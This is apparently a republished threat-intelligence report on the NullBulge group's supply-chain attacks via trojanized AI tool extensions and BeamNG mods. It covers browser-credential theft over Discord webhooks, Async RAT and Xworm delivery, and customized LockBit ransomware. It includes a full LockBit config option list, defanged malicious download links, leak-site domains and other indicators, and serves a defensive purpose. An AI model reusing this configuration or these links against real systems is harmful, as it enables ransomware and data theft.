X-Industry

Between April and June 2024, the NullBulge group emerged, targeting users in AI-centric applications and gaming communities.  The NullBulge persona has showcased creative methods of distributing malware targeting said tools and platforms.  Though the group projects an image of activism claiming to be “protecting artists around the world” and claims to be motivated by a pro-art, anti-AI cause rather than profit, other activities tied to this threat actor may indicate otherwise.

NullBulge’s services via the group’s DLS

One service the group offers is described as “payback through honeypots and malicious mods.”  The group delivers on this claim by targeting extensions and modifications of commonly used AI-art-adjacent applications and games.  This has been their main focus recently, providing a small variety of malware payloads.

NullBulge’s attacks are characterized by ‘poisoning the well’: the group targets the software supply chain by injecting malicious code into legitimate software distribution mechanisms, exploiting trusted platforms like GitHub, Reddit, and Hugging Face to maximize their reach.  NullBulge announces their leaks via their own DLS/blog site, alongside occasional 4chan threads.  Further, the group uses customized LockBit ransomware builds to maximize the impact of their attacks.  In this post, we provide an overview of the NullBulge group’s malicious activities and technical details of their LockBit payloads.

Discord, Reddit, and GitHub Code Distribution - The NullBulge group carried out a series of malicious campaigns targeting the supply chain of AI tools and platforms across May and June 2024.  This includes the compromise of the ComfyUI_LLMVISION extension on GitHub.  Additionally, the threat actor distributed malicious code through BeamNG mods on Hugging Face and Reddit. The GitHub-centric (ComfyUI_LLMVISION) and Hugging Face-centric campaigns are characterized by Python-based payloads exfiltrating data via Discord webhook.  The group’s other campaigns distributed more malware, including Async RAT and Xworm.

GitHub repository for malicious libraries

These campaigns resulted in malicious Python scripts that harvest and transmit data via Discord webhook.  The threat actor modified the included ‘requirements.txt’ file to include custom Python wheels to integrate precompiled malicious versions of libraries from Anthropic and OpenAI.  For example, the malicious wheels referenced a fake version of the OpenAI library (1.16.3).  These trojanized libraries contain Python code (e.g., Fadmino.py), which harvests and logs Chrome and Firefox browser data via Network Security Services (NSS).  Additional scripts, e.g., admin.py, interpret and transmit the data via the Discord webhook URL.

admin.py with encrypted Discord URL

In these campaigns, admin.py and Fadmino.py collaborated to gather local, sensitive system data, organize and prepare the data, and finally transmit the harvested data to an external server via HTTP POST requests to the Discord webhook URL.

cadmino.py extended data collection scripts

The general flow in these scripts is: 

• Data Discovery/Extraction: pyand Fadmino.py gather browser login data (Chrome and Firefox usernames and passwords).
• Data Aggregation: pyand Cadmino.py gathers, parses, and extracts the data. Cadmino.py extends the data discovery to include geographic information, expanded system information, and installed applications. This includes data about security products and financial data.
• Data Transmission: pyconstructs the transmission URLS from an encrypted Discord webhook and performs the exfiltration.

Decrypted Discord URL from admin.py

The NullBulge group has also distributed malicious code via Hugging Face.  These include the maliciously crafted tools “SillyTavern Character Generator” and “Image Description with Claude Models and GPT-4 Vision”.  These tools contain malicious dependencies in an approach similar to that seen with the compromise of ComfyUI_LLMVISION repository. The malicious payloads delivered in these campaigns function identically to those observed in the ComfyUI_LLMVISION repository, which uses malicious wheels.

Distribution via HuggingFace

The AppleBotzz Identity - Across the GitHub and Hugging Face repository-centric attacks, the AppleBotzz identity hosts the code in both the compromised repositories and the posts on ModLand.  Some discussions focused on the possibility of AppleBotzz and the NullBulge threat actor being one and the same. NullBulge has claimed to control the ComfyUI_LLMVISION GitHub repository for its active duration.  No non-malicious code was posted in that repository, prompting skepticism about whether AppleBotzz and NullBulge are separate entities.  NullBulge made a statement on their blog indicating that they are separate entities and that the group previously compromised the original maintainer of the ComfyUI_LLMVISION GitHub repository.  The original manager’s credentials were compromised. As a result, the NullBulge threat actor is enabled to post the malicious code to the GitHub repository.

NullBulge statement on AppleBotzz identity

A similar statement was posted to the original ComfyUI_LLMVISION GitHub by the threat actor:

Archived statement on ComfyUI_LLMVISION GitHub

The AppleBotzz identity was also used on ModLand and similar platforms to spread malicious BeamNG mods.  The threat actors claim they could take over all accounts previously controlled by AppleBotzz on platforms like Hugging Face, GitHub, ModHub, and ModLand.  A more probable scenario is that NullBulge controls the AppleBotzz identity, central to its malware staging and delivery process.  However, there’s insufficient evidence to confirm this hypothesis at this time.

Malware Delivery | Async RAT and Xworm - NullBulge has targeted BeamNG users. This vehicle simulation game uses soft-body physics to realistically model vehicle dynamics, collisions, and deformations in an open-world sandbox environment.  On 4 June 2024, a thread was posted in the BeamNG communities forum titled “BeamNG mods are not safe anymore,” highlighting an emerging concern over specific mods for BeamNG.  This compromise was further detailed in a YouTube video from Eric Parker.  The attack originates from malicious LUA code delivered in a BeamNG mod file.  Obfuscated PowerShell was injected into the mod files that subsequently downloaded Async RAT or Xworm, which in turn led to the deployment of their customized LockBit payloads.  Initial distribution of the trojanized mods occurs via base64-encoded links across social media profiles set up by the threat actor.  The malicious mods were also distributed via ModLand and similar BeamNG-related communities.

Malicious ModLand post, AppleBotzz identity

Base64-encoded link for malicious BeamNG mod distribution

These encoded links decode malicious links hosted on various services, including Modsfire and pixeldrain. Examples are as follows:

• https[:]//modsfire[.]com/IzozIsm52J72cWM
• https[:]//modsfire[.]com/1Nhyzs0OpLDu204
• https[:]//modsfire[.]com/IzpzklsmT2jz7W1
• http[:]//pixeldrain[.]com/api/file/HnEcyLBm
• https[:]//pixeldrain[.]com/api/file/SoRcBJnZ

These now-defunct links led to Async RAT payloads.

The malicious BeamNG mods were distributed via torrent or zip archive across BeamNG-focused forums and subreddits.  The maliciously crafted mods contain Lua code, executed upon ingesting the mod file by BeamNG.  The malicious Lua code is placed into the various Lua ‘extensions’ packaged into the BeamNG mod (example: VersionCheck.lua: 5c61e08914d4108aa52401412a61ddbbb68ca7cc)

Obfuscated Powershell in malicious BeamNG mod

The Lua files contain base64-encoded PowerShell that, when decoded, downloads and executes the Async RAT sample (via Invoke-WebRequest). The specific string in the previous image decodes to the download request below.

In this case, the Async RAT instance is downloaded from a pixeldrain[.]com address and executed under the process name BeamNG.UI.exe.

Custom LockBit Payloads - NullBulge delivers LockBit ransomware payloads to their Async and Xworm victims as a later-stage infection.  The aforementioned Eric Parker video also discusses this portion of the attack.  NullBulge payloads are built using the LockBit 3.0 (aka LockBit Black) builder, aside from a customized configuration file (config.json).

• SHA1: bca6d4ab71100b0ab353b83e9eb6274bb018644e
• Name: LockBit3Builder.zip

Along with config.json, NullBulge is built with builder.exe, keygen.exe, and build.bat, a batch file for automated builds of paired and decryptor executables.  Build.bat (804a1d0c4a280b18e778e4b97f85562fa6d5a4e6) is also unchanged from standard leaked bundles of the LockBit 3.0/LockBit Black builder.

Unmodified build.bat from the NullBulge builder archive

The config.json (705d068fb2394be5ea3cb8ba95852f4a764653a9) file contains settings for the payload UID along with all the behavioral components to be controlled upon the building of the payloads.  This includes the following configuration settings:

• "encrypt_mode": "auto",
• "encrypt_filename": false,
• "impersonation": true,
• "skip_hidden_folders": false,
• "language_check": false,
• "local_disks": true,
• "network_shares": true,
• "kill_processes": true,
• "kill_services": true,
• "running_one": true,
• "print_note": true,
• "set_wallpaper": true,
• "set_icons": true,
• "send_report": false,
• "self_destruct": true,
• "kill_defender": true,
• "wipe_freespace": false,
• "psexec_netspread": false,
• "gpo_netspread": true,
• "gpo_ps_update": true,
• "shutdown_system": false,
• "delete_eventlogs": true,
• "delete_gpo_delay": 1

In the provided configuration, encryption is set to auto rather than fast mode. The option to encrypt network shares and the standard encryption of local volumes are enabled. The malware is also configured to self-delete after execution and send ransom notes to attached printers. The configuration also outlines which files and folders are included or excluded from encryption and what processes to terminate. The contents of the ransom note are defined in the config.json file.

NullBulge config.json

The ransom note construction is also handled via the config.json file, customized with NullBulge’s identifying modifications.

NullBulge ransom note configuration

Data Leak Sites and Recent Targeting - NullBulge has multiple active leak sites. Its initial .com and .onion sites went live in late May 2024.  As of July 2024, the .se and .co domains are active and updated continuously.  Their domains include:

• goocasino[.]org
• nullbulge[.]com
• nullbulge[.]se
• nullbulge[.]co
• nullblgtk7dwzpfklgktzll27ovvnj7pvqkoprmhubnnb32qcbmcpgid[.]onion

As of this writing, the NullBulge DLS has listed multiple victims.  Most of the site is dedicated to documenting their cause along with standard rules of engagement.  At the end of June 2024, the NullBulge group announced a leak of information from Disney, which allegedly included .web publishing certificates and sprites from the animated series DuckTales.

Disney releases from NullBulge Disney releases from NullBulge

Disney releases from NullBulge

A “Release is Close” post later updated the Disney leaks.  This updated post contained a base64-encoded link to a ~670MB file, DuckTales_Isolated.zip, hosted on pixeldrain[.]com.

Leaked Disney data on pixeldrain

This archive contains multiple PhotoShop Document (PSD) files related to the DuckTales series.  These leaks were also posted to 4chan under the !!z694g7GKz7l identity.  The posts contain base64-encoded strings, which link to the leaked data.

NullBulge announcing Disney leaks on 4chan

On 12 July, the NullBulge group released a ~1.2TB archive purportedly containing multiple years of Disney’s internal Slack data.  The release of this data was preceded by countdown posts across the threat actor’s online profiles.  NullBulge claims they obtained the data using compromised corporate account credentials.

Countdown timer, 11 July 2024

Profiles and Other Activities - In addition to 4chan posts under !!z694g7GKz7l, NullBulge maintains active profiles across multiple common underground forums.  They have a history of selling infostealer logs from their custom stealer on the CRACKED[.]io forum.

NullBulge selling infostealer logs on cracked[.]io forum

The actor also has a history of selling stolen OpenAI API keys in these forums.  This demonstrates that NullBulge’s malicious activity is not limited to those that protect artists' rights.  Its activities are financially focused, and it can develop or acquire whatever tools are needed to further this cause.  The actor behind NullBulge also maintains a GitHub repository under the name NullBulgeOfficial, containing their Discord webhook libraries and their custom Python library for interacting with the AvCheck API.  Additionally, NullBulge has a mysellix[.]io profile, which has been used to sell OpenAI API keys.

NullBulge OpenAI API key sales

Conclusion - NullBulge is a low-sophistication actor, targeting an emerging pool of victims with commodity malware and ransomware.  The group’s invasive targeting of AI-centric games and applications threatens those working with such technologies and highlights an intriguing area of focus for threat actors.  Its methods of staging and delivering malicious code, such as obfuscated code in public repositories, is not new, but the target demographic is an emerging sector that is increasingly being targeted.  Groups like NullBulge represent the ongoing threat of low-barrier-of-entry ransomware, combined with the evergreen effect of infostealer infections.

NullBulge and similar threat actors use well-seasoned malware families like Xworm and Async RAT.  These tools generate infostealer logs that can fuel bigger and more elaborate attacks, as demonstrated in the recent attack against Snowflake.  Additionally, the attack surface for platforms like BeamNG is ripe for exploitation.  In the BeamNG scenario, attackers execute privileged code via PowerShell through ‘trusted’ Lua scripts when installing the game mods.  This is a very attractive mechanism for malicious actors and not dissimilar to software supply-chain attacks that deliver payloads through NPM packages, which we have discussed previously.

To reduce your organization’s exposure to techniques used by NullBulge, consider the following security measures:

• API Key Management: Store API keys securely and avoid hardcoding them in your code. Use environment variables or secure vaults to manage sensitive information. Regularly rotate API keys to minimize the potential impact of a compromise.
• Code Review and Verification: Inspect third-party code elements for obfuscated or suspicious content. Pay close attention to dependencies in support files like txt and equivalent. Ensure that third-party code is ingested from a trusted and verified source. Routinely review commit histories and have a clear understanding of active contributors so as to spot ‘suspicious’ commits or inquiries. Be wary of installing code from public sources that are subject to low or no scrutiny.

Indicators of Compromise

Network

group.goocasino[.]org
nullbulge[.]com
nullbulge[.]se
nullbulge[.]co
86[.]107.168.9

• nullblgtk7dwzpfklgktzll27ovvnj7pvqkoprmhubnnb32qcbmcpgid[.]onion
• XMR (Monero) Address
• 45i7kjWZuzJ4PdSbandaaE8S6mQATmneTYEpgsaaCqDmc7foEJDXwxd3ABR8bn6YE4c7hZ2dYEEr1CwG48gAknPL6zUpYyV

This article is shared at no charge and is for educational and informational purposes only.

Again, we’d like to thank Sentinel Labs for this great analysis.  Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com    

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941 

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424